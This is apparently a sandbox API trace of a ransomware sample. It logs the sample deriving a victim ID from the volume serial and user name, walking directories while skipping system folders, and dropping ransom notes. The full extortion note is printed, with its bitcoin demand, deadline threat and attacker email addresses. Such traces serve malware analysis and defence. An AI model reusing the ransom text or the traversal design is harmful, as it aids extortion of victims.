	[0166.817] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.817] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.817] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0166.818] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0166.818] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\crypto\\pcpksp\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.819] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0166.819] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0166.819] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0166.819] CloseHandle (hObject=0x388) returned 1
	[0166.820] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.820] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.820] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0166.820] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\HELP_DECRYPT_YOUR_FILES.HTML") returned 71
	[0166.820] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\pcpksp\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.825] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0166.825] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0166.828] CloseHandle (hObject=0x388) returned 1
	[0166.829] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0166.830] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.830] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.830] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0166.832] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.832] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\pcpksp\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.832] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0166.832] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.832] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0166.833] CloseHandle (hObject=0x388) returned 1
	[0166.833] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\*.*" (normalized: "c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7cf66099, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0166.833] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\*.*") returned 46
	[0166.834] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.834] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\*.*", cchLength=0x2e | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*") returned 0x2e
	[0166.834] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.834] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="windows") returned 0x0
	[0166.834] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.834] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="boot") returned 0x0
	[0166.834] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.835] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="system volume information") returned 0x0
	[0166.835] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.835] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.835] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.835] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="temp") returned 0x0
	[0166.835] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.836] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="program files") returned 0x0
	[0166.836] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.836] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.836] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.836] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="appdata") returned 0x0
	[0166.836] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.836] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="application data") returned 0x0
	[0166.836] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.837] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="winnt") returned 0x0
	[0166.837] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.837] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="tmp") returned 0x0
	[0166.837] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.837] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="cache") returned 0x0
	[0166.837] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.837] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.838] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.838] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="webcache") returned 0x0
	[0166.838] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.838] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="inetcache") returned 0x0
	[0166.838] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.838] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="nvidia") returned 0x0
	[0166.838] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.839] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="packages") returned 0x0
	[0166.839] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.839] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="cookies") returned 0x0
	[0166.839] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.839] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="programdata") returned 0x0
	[0166.839] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0166.839] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0166.839] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7cf66099, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.840] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0166.840] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cf66099, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7cf66099, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7cf8c337, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0166.840] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cf3fcb5, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7cf3fcb5, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7cf66099, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0166.840] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsAIK", cAlternateFileName="WINDOW~1")) returned 1
	[0166.840] lstrcmpW (lpString1="WindowsAIK", lpString2="..") returned 1
	[0166.840] lstrcmpW (lpString1="WindowsAIK", lpString2=".") returned 1
	[0166.840] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP"
	[0166.840] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\"
	[0166.840] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\", lpString2="WindowsAIK" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK"
	[0166.841] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK"
	[0166.841] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\"
	[0166.841] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\"
	[0166.841] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\*.*"
	[0166.841] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\*.*" (normalized: "c:\\users\\all users\\microsoft\\crypto\\pcpksp\\windowsaik\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0166.842] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\*.*") returned 57
	[0166.842] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.842] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\*.*", cchLength=0x39 | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\windowsaik\\*.*") returned 0x39
	[0166.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.842] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\windowsaik\\*.*", lpSrch="windows") returned="windowsaik\\*.*"
	[0166.842] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0166.842] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK"
	[0166.843] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\*.*"
	[0166.843] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.843] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.843] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\HELP_DECRYPT_YOUR_FILES.TXT") returned 81
	[0166.843] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\crypto\\pcpksp\\windowsaik\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.892] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0166.892] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0166.895] CloseHandle (hObject=0x390) returned 1
	[0166.896] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.897] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0166.898] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0166.898] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\crypto\\pcpksp\\windowsaik\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.898] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0166.899] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0166.899] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0166.899] CloseHandle (hObject=0x390) returned 1
	[0166.900] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.900] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.900] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0166.900] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\HELP_DECRYPT_YOUR_FILES.HTML") returned 82
	[0166.900] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\pcpksp\\windowsaik\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.901] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0166.901] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0166.904] CloseHandle (hObject=0x390) returned 1
	[0166.905] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0166.905] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.905] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.906] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0166.907] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.907] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\pcpksp\\windowsaik\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.908] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
